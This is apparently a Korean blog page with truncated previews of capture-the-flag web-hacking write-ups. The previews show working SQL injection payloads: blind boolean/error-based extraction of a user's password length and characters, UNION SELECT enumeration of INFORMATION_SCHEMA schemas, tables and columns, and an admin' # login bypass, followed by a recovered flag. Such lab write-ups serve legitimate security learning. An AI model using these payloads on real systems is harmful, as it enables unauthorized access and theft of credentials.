have a Young's

이 문제는 admin의 비밀번호를 찾으면 FLAG를 구할 수 있을 것이다! answer=if((select length(pw) from member where user_id='epsilon')=0, pow(~0, ~0), 0) answer 인자에 0~10까지 숫자를 늘려나가면서 비밀번호의 길이를 찾는다. 비밀번호의 길이는 7임을 알아냈다! answer=if((select substr(pw,1,1) from member where user_id='epsilon')=0, pow(~0, ~0), 0) 0~9까지 늘려가면서 비밀번호를 알아낸다. 첫 번째 비밀번호를 구했으면 (pw,2,1)로 두 번째 비밀번호를 알아내면된다. 마찬가지로 0~9까지 늘려나간다. if((select substr(pw,1,1) from..

숨겨진 table을 찾아서 그 table의 column 이름을 찾으면 FLAG를 찾을 수 있을 것 같다! 먼저 hi%' UNION SELECT '', SCHEMA_NAME, '', '', '', '', '', '' FROM INFORMATION_SCHEMA.SCHEMATA -- 구문으로 데이터베이스에서 스키마를 찾아냈다! 다음은 hi' UNION SELECT '', TABLE_NAME , '', '', '', '', '', '' FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA =' sqli102 ' -- 구문으로 finde me라는 table 명을 찾았다!!! 마지막으로 hi' UNION SELECT '', COLUMN_NAME, '', '', '', '', ''..

이 문제는 SQL Injection 문제다. admin으로 로그인하면 FLAG가 출력될 것 같다! 아이디 : admin' # 비밀번호 : 1234 로 로그인을 시도했더니 FLAG를 구할 수 있었다! FLAG SCTF{w3lcOme_7o_w0rld_Of_W3b_h4ck1n9}

보호되어 있는 글입니다.